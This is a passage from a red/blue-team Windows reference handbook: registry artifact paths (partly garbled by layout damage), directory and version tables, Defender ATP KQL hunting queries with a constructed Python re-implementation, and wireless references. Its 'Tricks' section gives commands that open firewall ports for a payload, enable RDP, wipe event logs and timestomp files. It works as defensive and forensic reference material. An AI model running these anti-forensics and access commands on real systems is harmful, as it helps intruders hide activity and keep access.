WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx\*
WindowsRunKeys | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\Run\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\RunOnce\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Setup\*
WindowsRunKeys | - | HKEY_USERS\%SID%\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx\*
WindowsRunServices | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\*
WindowsRunServices | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\*
WindowsRunServices | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce\*
WindowsRunServices | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices\*
WindowsSystemPolicyShell | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
WindowsSystemPolicyShell | - | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\System
WindowsWinlogonNotify | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\*
WindowsWinlogonNotify | - | HKEY_USERS\%SID%\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\*
WindowsWinlogonShell | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
WindowsWinlogonShell | - | HKEY_USERS\%SID%\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
WindowsWinlogonShell (GINA DLL) | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
WindowsWinlogonShell (GINA DLL) | - | HKEY_USERS\%SID%\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Winlogon Userinit | 7 | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Winlogon Userinit | - | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Winlogon Userinit | - | HKEY_USERS\%SID%\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
WinRAR | - | NTUSER.DAT\Software\WinRAR\DialogEditHistory\ArcName
WinRAR | - | NTUSER.DAT\Software\WinRAR\DialogEditHistory\ExtrPath
WinRAR Extracted Files MRU | - | NTUSER.DAT\Software\WinRAR\ArcHistory
WinZip 11.1 Accessed Archives | 7 | NTUSER.DAT\Software\Nico Mak Computing\filemenu / filemenu##
WinZip 11.1 Extraction MRU | 7 | NTUSER.DAT\Software\Nico Mak Computing\Extract / extract#
WinZip 11.1 Registered User | 7 | NTUSER.DAT\Software\Nico Mak Computing\WinIni / Name 1
WinZip 11.1 Temp File | 7 | NTUSER.DAT\Software\Nico Mak Computing\Directories / ZipTemp
WinZip Accessed Archives | - | NTUSER.DAT\Software\Nico Mak Computing\filemenu / filemenu##
WinZip Extraction MRU | - | NTUSER.DAT\Software\Nico Mak Computing\Extract / extract#
WinZip Location Extracted To | - | NTUSER.DAT\Software\Nico Mak Computing\Directories / ExtractTo
WinZip Registered User | - | NTUSER.DAT\Software\Nico Mak Computing\WinIni / Name 1
WinZip Temp File | - | NTUSER.DAT\Software\Nico Mak Computing\Directories / ZipTemp
WinZip Zip Creation Location | - | NTUSER.DAT\Software\Nico Mak Computing\Directories / AddDir
WinZip Zip Creation Location | - | NTUSER.DAT\Software\Nico Mak Computing\Directories / DefDir
Wireless Associations to SSIDs by User | 7 8 10 | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\
Wireless Connections Post XP | 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\
Wireless Post XP | 7 8 10 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed (or Unmanaged)\
SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\{0E271E68
X -9033- 4A25-9883-
Wireless XP P A020B191B3C1} /Static#####
SOFTWARE\Microsoft\EAPOL\ Par
ameters\Interfaces\{0E271E68-
X 9033- 4A25-9883-A020B191B3C1}
Wireless XP P / #
[Link]\Software\Microsoft
X 1 \ Windows\CurrentVersion\Appl
WordPad MRU P 7 8 0 ets\ Wordpad\Recent File List
WPD Bus Enum 1 SYSTEM\ControlSet001\Enum\ SW
Enumeration 8 0 D\WPDBUSENUM
WPD Bus Enum Root
Enumeration User Mode 1 SYSTEM\ControlSet001\Enum\ Wp
Bus Drive Enumeration 7 8 0 dBusEnumRoot\UMB\
SYSTEM\ControlSet001\ Control
1 \DeviceClasses\{6ac27878-
WPD Device Interface 7 8 0 a6fa-4155-ba85-f98f491d4f33}
Write Block USB SYSTEM\ControlSet###\Control\
Devices 7 storageDevicePolicies\
SYSTEM\ControlSet###\Control\
Write Block USB X StorageDevicePolicies /
Devices P 7 8 WriteProtect
XP Search Assistant X [Link]\Software\Microsoft
history P \Search Assistant\ACMru\####
[Link]\Software\Yahoo\Pag
Yahoo Chat Rooms er\ profiles\\Chat
[Link]\Software\Yahoo\Pag
Yahoo! er\ Profiles\*
[Link]\Software\Yahoo\Pag
Yahoo! File Transfers er\ File Transfer

414
[Link]\Software\Yahoo\Pag
er\ profiles\screen name
Yahoo! File Transfers \ FileTransfer
[Link]\Software\Yahoo\Pag
er\ profiles\screen name /
All Identities, Selected
Yahoo! Identities Identities
[Link]\Software\Yahoo\ Pa
Yahoo! Last User ger - Yahoo! User ID
[Link]\Software\Yahoo\Pag
Yahoo! Message er\ profiles\screen
Archiving name\Archive
[Link]\Software\Yahoo\ Pa
Yahoo! Password ger - EOptions string
[Link]\Software\Yahoo\Pag
Yahoo! Recent er\ profiles\screen
Contacts name\IMVironments\ Recent
[Link]\Software\Yahoo\ Pa
Yahoo! Saved Password ger - Save Password
[Link]\Software\Yahoo\Pag
Yahoo! Screen Names er\ profiles\screen name
[Link]\Software\Yahoo\Yse
Yserver rver

REFERENCE:
[Link]
[Link]
[Link]
58b7e00011f6947/1565096688890/Windows+Registry+Auditing+Cheat+Sheet+ver+Aug
+[Link]

WINDOWS_Structure
ALL INFORMATIONAL WINDOWS
Windows top-level default file structure and locations in C:\.

DIRECTORY / DESCRIPTION

\PerfLogs
    Windows performance logs; on a default configuration it is empty.

\Program Files
    32-bit architecture: 16-bit and 32-bit programs are installed in this folder.
    64-bit architecture: 64-bit programs are installed in this folder.

\Program Files (x86)
    Appears on 64-bit editions of Windows. 32-bit and 16-bit programs are by default installed in this folder.

\ProgramData
    Contains program data that is expected to be accessed by applications system-wide. The organization of the files is at the discretion of the developer.

\Users
    Contains one subfolder for each user that has logged onto the system at least once. In addition: "Public" and "Default" (hidden), "Default User" (NTFS "Default" folder) and "All Users" (NTFS symbolic link to "C:\ProgramData").

\Users\Public
    Serves as a buffer for users of a computer to share files. By default, this folder is accessible to all users that can log on to the computer and is shared over the network with a valid user account. It contains user-created data (typically empty).

%USER%\AppData
    Stores per-user application data and settings. The folder contains three subfolders: Roaming, Local, and LocalLow. Data saved in Roaming synchronizes with roaming profiles to other computers when the user logs in; Local and LocalLow do not sync with networked computers.

\Windows
    Windows itself is installed into this folder.

\Windows\System
\Windows\System32
\Windows\SysWOW64
    These folders store the DLL files that implement the core features of Windows. Any time a program asks Windows to load a DLL and does not specify a path, these folders are searched after the program's own folder. "System" stores 16-bit DLLs and is normally empty on 64-bit editions of Windows. "System32" stores either 32-bit or 64-bit DLL files, depending on whether the Windows edition is 32-bit or 64-bit. "SysWOW64" only appears on 64-bit editions of Windows and stores 32-bit DLLs.

\WinSxS
    Officially called the "Windows component store", this folder constitutes the majority of Windows. A copy of all Windows components, as well as all Windows updates and service packs, is stored here. Starting with Windows 7 and Windows Server 2008 R2, Windows automatically scavenges this folder to keep its size in check. For security reasons and to avoid DLL issues, Windows enforces very stringent requirements on the files in it.

WINDOWS_Tricks
RED/BLUE TEAM MISC WINDOWS

Allow payload traffic through firewall:

netsh firewall add allowedprogram C:\[Link] MyPayload ENABLE

Open port on firewall:

netsh firewall add portopening TCP 1234 MyPayload ENABLE ALL

Delete open port on firewall:

netsh firewall delete portopening TCP 1234

Enable Remote Desktop:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable NTFS last-access time updates (set the NtfsDisableLastAccessUpdate reg key to 0):

reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v NtfsDisableLastAccessUpdate /d 0 /t REG_DWORD /f

POWERSHELL REVERSE TCP SHELL

[Link]

WINDOWS COVER TRACKS

Delete all log files from the WINDIR directory:

del %WINDIR%\*.log /a /s /q /f

Delete all System log files (cmd):

for /f %a in ('wevtutil el') do @wevtutil cl "%a"

Delete specific System log files:

#1 List System log files
wevtutil el
#2 Delete a specific System log
wevtutil cl [LOGNAME]

Delete all System log files (PowerShell):

wevtutil el | Foreach-Object {wevtutil cl "$_"}

PowerShell: change the creation time of a directory

PS> (Get-Item "C:\Windows\system32\MyDir").CreationTime=("01 March 2019 [Link]")

PowerShell: change the modification time of a file

PS> (Get-Item "C:\Windows\system32\MyDir\[Link]").LastWriteTime=("01 March 2019 [Link]")

PowerShell: change the access time of a file

PS> (Get-Item "C:\Windows\system32\MyDir\[Link]").LastAccessTime=("01 March 2019 [Link]")

PowerShell: change the creation time of all files in the current directory

$files = Get-ChildItem -Force | Where-Object {! $_.PSIsContainer}
foreach($object in $files)
{
    $object.CreationTime=("01 March 2019 [Link]")
}

WINDOWS_Versions
ALL INFORMATIONAL WINDOWS

VERSION DATE RELEASE LATEST


Windows 10 15-Jul-15 NT 10.0 18362 1903
Windows 8.1 27-Aug-13 NT 6.3 9600
Windows 8 01-Aug-12 NT 6.2 9200
Windows 7 22-Jul-09 NT 6.1 7601
Windows Vista 08-Nov-06 NT 6.0 6002
Windows XP Pro 25-Apr-05 NT 5.2 3790
Windows XP 24-Aug-01 NT 5.1 2600
Windows Me 19-Jun-00 4.9 3000
Windows 2000 15-Dec-99 NT 5.0 2195
Windows 98 15-May-98 4.1 2222 A
Windows NT 4.0 31-Jul-96 NT 4.0 1381
Windows 95 15-Aug-95 4 950
Windows NT 3.51 30-May-95 NT 3.51 1057
Windows NT 3.5 21-Sep-94 NT 3.5 807
Windows 3.2 22-Nov-93 3.2 153
Windows 3.11 08-Nov-93 3.11 300
Windows NT 3.1 27-Jul-93 NT 3.1 528
Windows 3.1 06-Apr-92 3.1 103
Windows 3.0 22-May-90 3 N/A
Windows 2.11 13-Mar-89 2.11 N/A
Windows 2.10 27-May-88 2.1 N/A
Windows 2.03 09-Dec-87 2.03 N/A

Windows 1.04 10-Apr-87 1.04 N/A
Windows 1.03 21-Aug-86 1.03 N/A
Windows 1.02 14-May-86 1.02 N/A
Windows 1.0 20-Nov-85 1.01 N/A

REFERENCE:
[Link]

WINDOWS DEFENDER ATP
BLUE TEAM THREAT HUNT WINDOWS
Microsoft Defender Advanced Threat Protection is a platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats. The advanced hunting queries below are written in Kusto Query Language (KQL).

DESCRIPTION / QUERY

Possible RDP tunnel
  ProcessCreationEvents
  | where EventTime > ago(10d)
  | where (ProcessCommandLine contains ":3389" or ProcessCommandLine contains ":6511")
  | project EventTime, ComputerName, AccountName, InitiatingProcessFileName, ActionType,
            FileName, ProcessCommandLine, InitiatingProcessCommandLine

Allow RDP connection
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where (ProcessCommandLine contains "SC CONFIG" and ProcessCommandLine contains "DISABLED"
           and ProcessCommandLine contains "wuauserv")
      or (ProcessCommandLine contains "Terminal Serve" and ProcessCommandLine contains "fDenyTSConnections"
           and ProcessCommandLine contains "0x0")
  | summarize makeset(ComputerName), makeset(AccountName), makeset(ProcessCommandLine)
        by InitiatingProcessFileName

inf file echo creation/execution
  ProcessCreationEvents
  | where EventTime > ago(17d)
  | where ProcessCommandLine contains "echo" and ProcessCommandLine contains ".inf"
  | summarize makeset(ComputerName), makeset(AccountName), makeset(ProcessCommandLine)
        by InitiatingProcessFileName

Accounts Creation
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where ProcessCommandLine contains "net user" and ProcessCommandLine contains "/add"
  | summarize makeset(ComputerName), makeset(AccountName), makeset(ProcessCommandLine)
        by InitiatingProcessFileName

Local Accounts Activation
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where ProcessCommandLine contains "Administrator /active:yes"
      or ProcessCommandLine contains "guest /active:yes"
  | summarize makeset(ComputerName), makeset(AccountName), makeset(ProcessCommandLine)
        by InitiatingProcessFileName

User Addition to Local Groups
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where ProcessCommandLine contains "localgroup" and ProcessCommandLine contains "/add"
      and (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "administrators")
  | summarize makeset(ComputerName), makeset(AccountName), makeset(ProcessCommandLine)
        by InitiatingProcessFileName

Service Creation
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName contains "SECEDIT"
  | where ProcessCommandLine == @"[Link] /export /cfg ** .inf"
  | summarize makeset(ComputerName), makeset(AccountName), makeset(ProcessCommandLine)
        by InitiatingProcessFileName

Alert Events
  AlertEvents
  | where EventTime > ago(7d)
  | summarize makeset(FileName), dcount(FileName), makeset(ComputerName), makeset(Category),
              dcount(ComputerName) by Title
  | sort by dcount_ComputerName desc

Alert Events by Category
  AlertEvents
  | where EventTime > ago(7d)
  | summarize dcount(ComputerName), dcount(FileName), makeset(FileName), makeset(ComputerName)
        by Category, Severity
  | sort by dcount_ComputerName desc

Alert Events by ComputerName
  AlertEvents
  | where EventTime > ago(7d)
  | summarize dcount(Category), dcount(FileName), makeset(Category), makeset(FileName)
        by ComputerName, Severity
  | sort by dcount_Category desc

Alert Events by FileName
  AlertEvents
  | where EventTime > ago(7d)
  | summarize dcount(ComputerName), dcount(Category), makeset(Severity), makeset(Category),
              makeset(ComputerName) by FileName
  | sort by dcount_ComputerName desc

Alert Events by Win Defender
  MiscEvents
  | where EventTime > ago(17d)
  | where ActionType == "WDAVDetection"
  | summarize makeset(FileName), makeset(InitiatingProcessParentFileName),
              makeset(InitiatingProcessFileName), makeset(InitiatingProcessCommandLine),
              makeset(FolderPath), makeset(InitiatingProcessFolderPath), makeset(AccountName)
        by ComputerName

Clearing Event Log Activity
  ProcessCreationEvents
  | where EventTime > ago(10d)
  | where ProcessCommandLine contains "call ClearEventlog"
      or InitiatingProcessCommandLine contains "call ClearEventlog"
  | summarize makeset(ComputerName), makeset(AccountName), dcount(ComputerName)
        by InitiatingProcessFileName, ProcessCommandLine
  | sort by dcount_ComputerName desc

Output Redirection Activity
  ProcessCreationEvents
  | where EventTime > ago(10d)
  | where ProcessCommandLine contains "2>&1"
  | summarize makeset(ComputerName), makeset(AccountName), dcount(ComputerName)
        by InitiatingProcessFileName, ProcessCommandLine
  | sort by dcount_ComputerName desc

Remote Share Mounting Activity
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where ProcessCommandLine contains "[Link]"
  | where ProcessCommandLine contains "\\c$" or ProcessCommandLine contains "\\admin$"
      or ProcessCommandLine contains "\\ipc$"

IMPACKET Artifact Search
  ProcessCreationEvents
  | where EventTime > ago(10d)
  | where ProcessCommandLine contains "[Link]\\ADMIN$\\" and ProcessCommandLine contains "2>&1"
  | project EventTime, InitiatingProcessFileName, ProcessCommandLine, AccountName, ComputerName
  | sort by InitiatingProcessFileName desc
  | top 1000 by EventTime

Process Dump Activity
  ProcessCreationEvents
  | where EventTime > ago(10d)
  | where (ProcessCommandLine contains "-accepteula" and ProcessCommandLine contains "1>")
      or (ProcessCommandLine contains "-accepteula" and ProcessCommandLine contains "-ma")
  | summarize makeset(ComputerName), makeset(AccountName), dcount(ComputerName)
        by InitiatingProcessFileName, ProcessCommandLine
  | sort by dcount_ComputerName desc

Network Activity thru Cscript/Wscript
  NetworkCommunicationEvents
  | where EventTime > ago(7d)
  | where InitiatingProcessFileName in ("[Link]", "[Link]")
  | summarize makeset(InitiatingProcessParentName), makeset(RemoteUrl), makeset(RemotePort),
              makeset(InitiatingProcessAccountName), dcount(RemoteUrl)
        by InitiatingProcessCommandLine
  | sort by dcount_RemoteUrl desc

Network Activity thru PowerShell
  NetworkCommunicationEvents
  | where EventTime > ago(1d)
  | where InitiatingProcessFileName =~ "[Link]"
  | summarize makeset(RemoteUrl), makeset(RemotePort), makeset(InitiatingProcessAccountName),
              dcount(RemoteUrl) by InitiatingProcessCommandLine
  | sort by dcount_RemoteUrl desc

BitsAdmin Execution
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName contains "[Link]"
  | where ProcessCommandLine contains "/TRANSFER" or ProcessCommandLine contains "/CREATE"
      or ProcessCommandLine contains "/ADDFILE" or ProcessCommandLine contains "/SETPROXY"
      or ProcessCommandLine contains "/SETNOTIFYCMDLINE" or ProcessCommandLine contains "/SETCUSTOMHEADERS"
      or ProcessCommandLine contains "/SETSECURITYFLAGS" or ProcessCommandLine contains "/SETREPLYFILENAME"
  | project EventTime, ComputerName, ProcessCommandLine, InitiatingProcessFileName, AccountName
  | top 1000 by EventTime

BitsAdmin Transfer
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where ProcessCommandLine contains "/transfer"
  | project EventTime, ComputerName, ProcessCommandLine, InitiatingProcessFileName, AccountName
  | top 1000 by EventTime

LOLbin CertUtil Decode
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where ProcessCommandLine contains "-decode" and ProcessCommandLine contains "\\AppData\\"
  | project EventTime, ComputerName, ProcessCommandLine, InitiatingProcessFileName, AccountName
  | top 1000 by EventTime

MSOffice Abuse Indicators
  ProcessCreationEvents
  | where EventTime > ago(1d)
  | where InitiatingProcessParentName contains "[Link]" or InitiatingProcessParentName contains "[Link]"
      or InitiatingProcessParentName contains "[Link]"
  | where FileName contains "cscript" or FileName contains "wscript" or FileName contains "powershell"
  | project EventTime, ComputerName, ProcessCommandLine, InitiatingProcessFileName,
            InitiatingProcessParentName, AccountName
  | top 1000 by EventTime

LOLbin RunDll32 Activity
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where ProcessCommandLine contains ",Control_RunDLL"
  | summarize makeset(ComputerName), makeset(AccountName), dcount(ComputerName)
        by InitiatingProcessFileName, ProcessCommandLine
  | sort by dcount_ComputerName desc

LOLbin RunDll32 Register Server
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where ProcessCommandLine contains "DllRegisterServer"
  | summarize makeset(ComputerName), makeset(AccountName) by InitiatingProcessFileName, ProcessCommandLine
  | sort by InitiatingProcessFileName asc

LOLbin RunDll32 Suspicious Execution
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where InitiatingProcessFile
Name in ("[Link]", "[Link]", "[Link]", "[Link]", "[Link]")
  | summarize makeset(ComputerName), makeset(AccountName) by InitiatingProcessFileName, ProcessCommandLine
  | sort by InitiatingProcessFileName asc

LOLbin RunDll32 HTA Remote
  ProcessCreationEvents
  | where EventTime > ago(1d)
  | where FileName =~ "[Link]"
  | where ProcessCommandLine contains "mshtml,RunHTMLApplication"
  | project EventTime, ComputerName, ProcessCommandLine, InitiatingProcessFileName, AccountName
  | top 1000 by EventTime

LOLbin RunDll32 Roaming Profile
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where ProcessCommandLine contains "\\roaming\\"
  | where ProcessCommandLine !contains "\\STREAM Interactive (Emirates).appref-ms|"
  | summarize makeset(ComputerName), makeset(AccountName) by InitiatingProcessFileName, ProcessCommandLine
  | sort by InitiatingProcessFileName asc

[Link] Process Execution
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | project EventTime, ComputerName, ProcessCommandLine, InitiatingProcessFileName, AccountName
  | top 1000 by EventTime

WMIC Process call
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where ProcessCommandLine contains "process call create"
  | project EventTime, ComputerName, ProcessCommandLine, InitiatingProcessFileName, AccountName
  | top 1000 by EventTime

Process wscript to .js
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where ProcessCommandLine contains ".js"
  | summarize makeset(ComputerName), makeset(AccountName) by InitiatingProcessFileName, ProcessCommandLine
  | sort by InitiatingProcessFileName asc

Process wscript creating .zip/.rar
  ProcessCreationEvents
  | where EventTime > ago(7d)
  | where FileName =~ "[Link]"
  | where (ProcessCommandLine contains "\\appdata\\" and ProcessCommandLine contains ".zip")
      or ProcessCommandLine contains "\\Rar$*\\"
  | project EventTime, ComputerName, ProcessCommandLine, InitiatingProcessFileName, AccountName
  | top 1000 by EventTime
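As an added example (not part of the Operator Handbook or of Microsoft's query set), the following Python re-implements five of the ProcessCreationEvents hunts above as offline checks, mirroring KQL's case-insensitive `contains`, the `ago()` lookback and the `summarize makeset(...) by InitiatingProcessFileName` grouping. Hosts, accounts, timestamps and command lines in `sample_events()` are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass
class ProcessEvent:
    """Subset of the ProcessCreationEvents columns the queries above use."""
    EventTime: datetime
    ComputerName: str
    AccountName: str
    ProcessCommandLine: str
    InitiatingProcessFileName: str


def contains(haystack: str, needle: str) -> bool:
    """KQL 'contains' is a case-insensitive substring test."""
    return needle.lower() in haystack.lower()


def has_all(cmd: str, *needles: str) -> bool:
    return all(contains(cmd, n) for n in needles)


# (rule name, lookback window, predicate on ProcessCommandLine): one "where" clause each
RULES = [
    ("Allow RDP connection", timedelta(days=7), lambda c:
        has_all(c, "SC CONFIG", "DISABLED", "wuauserv")
        or has_all(c, "Terminal Serve", "fDenyTSConnections", "0x0")),
    ("Accounts Creation", timedelta(days=7), lambda c:
        has_all(c, "net user", "/add")),
    ("Local Accounts Activation", timedelta(days=7), lambda c:
        contains(c, "Administrator /active:yes") or contains(c, "guest /active:yes")),
    ("User Addition to Local Groups", timedelta(days=7), lambda c:
        has_all(c, "localgroup", "/add")
        and (contains(c, "Remote Desktop Users") or contains(c, "administrators"))),
    ("Clearing Event Log Activity", timedelta(days=10), lambda c:
        contains(c, "call ClearEventlog")),
]


def hunt(events, now):
    """Run every rule over the events, then group hits the way the queries'
    'summarize makeset(...) by InitiatingProcessFileName' does."""
    findings = {}
    for name, lookback, matches in RULES:
        for e in events:
            if e.EventTime <= now - lookback:          # EventTime > ago(Nd)
                continue
            if not matches(e.ProcessCommandLine):
                continue
            group = findings.setdefault(name, {}).setdefault(
                e.InitiatingProcessFileName,
                {"ComputerName": set(), "AccountName": set(), "ProcessCommandLine": set()})
            group["ComputerName"].add(e.ComputerName)
            group["AccountName"].add(e.AccountName)
            group["ProcessCommandLine"].add(e.ProcessCommandLine)
    return findings


NOW = datetime(2020, 4, 2, tzinfo=timezone.utc)   # fixed clock keeps the example deterministic
RDP_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"


def sample_events():
    """Constructed sample rows; hosts, accounts and timestamps are made up."""
    def days_ago(n):
        return NOW - timedelta(days=n)
    return [
        ProcessEvent(days_ago(1), "WS01", "jdoe", "net user svc_backup P@ssw0rd /add", "cmd.exe"),
        ProcessEvent(days_ago(1), "WS01", "jdoe",
                     'net localgroup "Remote Desktop Users" svc_backup /add', "cmd.exe"),
        ProcessEvent(days_ago(2), "WS02", "admin",
                     f'reg add "{RDP_KEY}" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f',
                     "powershell.exe"),
        # same change spelled as in WINDOWS_Tricks above ("/d 0"): the literal "0x0" test misses it
        ProcessEvent(days_ago(2), "WS03", "admin",
                     f'reg add "{RDP_KEY}" /v fDenyTSConnections /t REG_DWORD /d 0 /f', "cmd.exe"),
        ProcessEvent(days_ago(3), "WS01", "jdoe",
                     "wmic nteventlog where \"LogFileName='Security'\" call ClearEventlog", "cmd.exe"),
        ProcessEvent(days_ago(20), "WS04", "jdoe", "net user olduser /add", "cmd.exe"),  # outside 7d
        ProcessEvent(days_ago(1), "WS05", "svc", "net user", "cmd.exe"),                  # benign listing
    ]


if __name__ == "__main__":
    for rule, groups in hunt(sample_events(), NOW).items():
        for parent, sets in groups.items():
            print(rule, parent, sorted(sets["ComputerName"]), sorted(sets["ProcessCommandLine"]))
```

The WS03 row shows why literal substring rules need tuning: the "0x0" test only catches one spelling of the same registry change.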

Uncoder: One common language for cyber security

[Link]
[Link] is an online translator for SIEM saved searches, filters, queries, API requests, correlation rules and Sigma rules, built to help SOC analysts, threat hunters and SIEM engineers. Through an easy, fast and private UI you can translate queries from one tool to another in a matter of seconds, without needing access to the SIEM environment.
[Link] supports rules based on Sigma, ArcSight, Azure Sentinel, Elasticsearch, Graylog, Kibana, LogPoint, QRadar, Qualys, RSA NetWitness, Regex Grep, Splunk, Sumo Logic, Windows Defender ATP, Windows PowerShell, X-Pack Watcher.

REFERENCE:
[Link]
Hunting/tree/master/WindowsDefenderATP%20Hunting%20Queries%20
[Link]

WIRELESS FREQUENCIES
ALL INFORMATIONAL N/A

STANDARD                                      FREQUENCIES
802.11                                        2.4, 3.6, 4.9, 5.0, 5.2, 5.6, 5.8, 5.9 and 60 GHz
802.11a                                       5.0 GHz
802.11b/g                                     2.4 GHz
802.11n                                       2.4, 5.0 GHz
Bluetooth/BLE                                 2.4-2.4835 GHz
CDMA2000 (inc. EV-DO, 1xRTT)                  450, 850, 900 MHz; 1.7, 1.8, 1.9, and 2.1 GHz
EDGE/GPRS                                     850 MHz, 900 MHz, 1.8 GHz, and 1.9 GHz
EnOcean                                       868.3 MHz
Flash-OFDM                                    450 and 870 MHz
iBurst                                        1.8, 1.9, and 2.1 GHz
ISM Band                                      433 MHz, 915 MHz, 2.4 GHz, 5 GHz
Keyless FOB                                   315 MHz (US), 433.92 MHz (EU, Asia)
Low Rate WPAN (802.15.4)                      868 MHz (EU), 915 MHz (US), 2.4 GHz
RFID                                          120-150 kHz (LF), 13.56 MHz (HF)
UMTS FDD                                      850 MHz, 900 MHz, 2.0, 1.9/2.1, 2.1, and 1.7/2.1 GHz
UMTS-TDD                                      450, 850 MHz, 1.9, 2, 2.5, and 3.5 GHz
Vemesh                                        868 MHz, 915 MHz, and 953 MHz
WiMax (802.16e)                               2.3, 2.5, 3.5, 3.7, and 5.8 GHz
Wireless USB, UWB                             3.1 to 10.6 GHz
AT&T 4G [2, 4, 5, 12, 14, 17, 29, 30, 66]    1900MHz, 1700MHz abcde, 700MHz bc
Verizon Wireless 4G [2, 4, 5, 13, 66]        1900MHz, 1700MHz f, 700MHz c
T-Mobile 4G [2, 4, 5, 12, 66, 71]            1900MHz, 1700MHz def, 700MHz a, 600MHz
Sprint 4G [25, 26, 41]                        1900MHz g, 850MHz, 2500MHz
Europe 4G [3, 7, 20]                          1800MHz, 2600MHz, 800MHz
China, India 4G [40, 41]                      2300MHz, 2500MHz
Longwave AM Radio                             148.5 kHz - 283.5 kHz
Mediumwave AM Radio                           525 kHz - 1710 kHz
Shortwave AM Radio                            3 MHz - 30 MHz
HF                                            0.003 - 0.03 GHz
VHF                                           0.03 - 0.3 GHz
UHF                                           0.3 - 1 GHz
L                                             1 - 2 GHz
S                                             2 - 4 GHz
C                                             4 - 8 GHz
X                                             8 - 12 GHz
Ku                                            12 - 18 GHz
K                                             18 - 27 GHz
Ka                                            27 - 40 GHz
V                                             40 - 75 GHz
W                                             75 - 110 GHz
mm or G                                       110 - 300 GHz

REFERENCE
[Link]
[Link]

WIRELESS_Tools
BETTERCAP
[Link]
bettercap is a powerful, easily extensible and portable framework
written in Go which aims to offer to security researchers, red
teamers and reverse engineers an easy to use, all-in-one solution
with all the features they might possibly need for performing
reconnaissance and attacking WiFi networks, Bluetooth Low Energy
devices, wireless HID devices and Ethernet networks.

KISMET
[Link]
Kismet is a wireless network and device detector, sniffer,
wardriving tool, and WIDS (wireless intrusion detection) framework.
Kismet works with Wi-Fi interfaces, Bluetooth interfaces, some SDR
(software defined radio) hardware like the RTLSDR, and other
specialized capture hardware.

PWNAGOTCHI
[Link]
Pwnagotchi is an A2C-based “AI” powered by bettercap and running on
a Raspberry Pi Zero W that learns from its surrounding WiFi
environment in order to maximize the crackable WPA key material it
captures (either through passive sniffing or by performing
deauthentication and association attacks). This material is
collected on disk as PCAP files containing any form of handshake
supported by hashcat, including full and half WPA handshakes as
well as PMKIDs.

